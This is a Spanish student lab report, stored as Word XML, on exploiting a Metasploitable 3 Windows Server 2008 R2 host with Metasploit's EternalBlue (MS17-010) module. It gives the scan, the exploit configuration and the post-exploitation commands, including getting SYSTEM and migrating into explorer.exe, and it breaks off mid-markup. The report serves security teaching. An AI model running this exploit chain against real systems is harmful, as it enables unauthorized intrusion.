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337F8FA6" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="2551" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Informe de práctica con Kali Linux y Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3F0D89AA" w14:paraId="0EE15080" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3F0D89AA" w:rsidR="3F0D89AA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Explotación de Windows Server 2008 R2 mediante MS17-010 (EternalBlue)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3F0D89AA" w14:paraId="7F8EBC82" wp14:textId="1CED06B0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="1417" w:after="1417"/>
        <w:ind w:start="1417" w:end="1417" w:hanging="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="3F0D89AA" w:rsidR="3E956162">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Angel Santiago Diaz &amp; Jefferson Gutierrez</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3F0D89AA" w14:paraId="72C7A3E2" wp14:textId="03006693">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="1417" w:after="1417"/>
        <w:ind w:start="1417" w:end="1417" w:hanging="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Seguridad</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="119825F3">
        <w:rPr/>
        <w:t xml:space="preserve">de la </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Inform</w:t>
      </w:r>
      <w:r w:rsidR="7C19FF52">
        <w:rPr/>
        <w:t>ación</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3F0D89AA" w14:paraId="2A28E55B" wp14:textId="0D107A1F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="1417" w:after="1417"/>
        <w:ind w:start="1417" w:end="1417" w:hanging="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="4C1E6D99">
        <w:rPr/>
        <w:t>Ivan Dario Mendez</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2B529D95" w:rsidP="3F0D89AA" w:rsidRDefault="2B529D95" w14:paraId="26BF18E0" w14:textId="1A654E9B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="1417" w:after="1417"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="2B529D95">
        <w:rPr/>
        <w:t>U. Sergio Arboleda</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3F0D89AA" w14:paraId="370E6F94" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="1417" w:after="1417"/>
        <w:ind w:start="1417" w:end="1417" w:hanging="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="3F0D89AA" w:rsidR="3F0D89AA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Fecha:</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> 14 de agosto de 2026</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="42102903" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="21341E90" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Comprobar, dentro de un laboratorio virtual autorizado, si una máquina con Windows Server 2008 R2 era vulnerable a MS17-010 y obtener una sesión remota con Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F2F5F6A" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Entorno utilizado</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8761" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5403"/>
        <w:gridCol w:w="1419"/>
        <w:gridCol w:w="1939"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="48BB503F" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5403" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54BDAE1F" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Equipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A2FF6CA" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Dirección IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1939" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B54617A" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="78A0FBEB" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5403" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7730A81E" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6127CB7A" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>192.168.56.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1939" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E1765B0" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Máquina atacante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2C1C1E71" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5403" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56C53E23" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Metasploitable 3 / Windows Server 2008 R2 SP1 x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A2E5294" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>192.168.56.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1939" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5933E69B" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Máquina objetivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="230C33B1" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Primero se verificó la dirección de Kali con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ip a</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, la conectividad con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y el puerto SMB con:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="10A38385" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>nmap -Pn -p 445 192.168.56.3</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5D1CCD6E" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El resultado indicó que el puerto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>445/tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> estaba abierto.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="504958E2" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Procedimiento</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="05793A42" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.1 Preparación y búsqueda de módulos</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="186569C0" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>En Metasploit se revisó el estado de la base de datos y los hosts. Después se buscaron módulos para Windows 2008 y servicios como IIS, GlassFish, Jenkins y Elasticsearch:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5AC49742" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>db_status</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="730E17CA" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>hosts</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1AC9D21B" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>search windows 2008</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="66D353D1" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>search type:exploit glassfish</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1403D897" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>search type:exploit iis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6DCFE875" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>search type:exploit jenkins</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0EFB871C" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>search type:exploit elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B1ECA0A" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se probaron los módulos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ms01_026_dbldecode</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>glassfish_deployer</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, pero estas pruebas no generaron una sesión útil.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0F66FDAC" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.2 Configuración de EternalBlue</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="54D65EFE" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El módulo que produjo el acceso fue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Se configuró así:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="03148F0B" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="00CF323E" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>set RHOSTS 192.168.56.3</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="73F14E7E" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>set LHOST 192.168.56.4</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="18E45117" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="165AE9C6" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="74BA3318" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="624653DC" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyTextok"/>
        <w:pBdr>
          <w:left w:val="single" w:color="368A4E" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Metasploit detectó el objetivo como vulnerable y abrió una sesión Meterpreter desde 192.168.56.3 hacia Kali.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3C0471F3" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.3 Comprobación de la sesión</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="65ED87B5" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> se identificó Windows Server 2008 R2 SP1 de 64 bits. Con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> se comprobó inicialmente el usuario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. También se revisaron procesos con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y se migró al proceso gráfico </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="526CA47B" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4FF5C8A1" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7E2B4667" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="68AAC18D" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
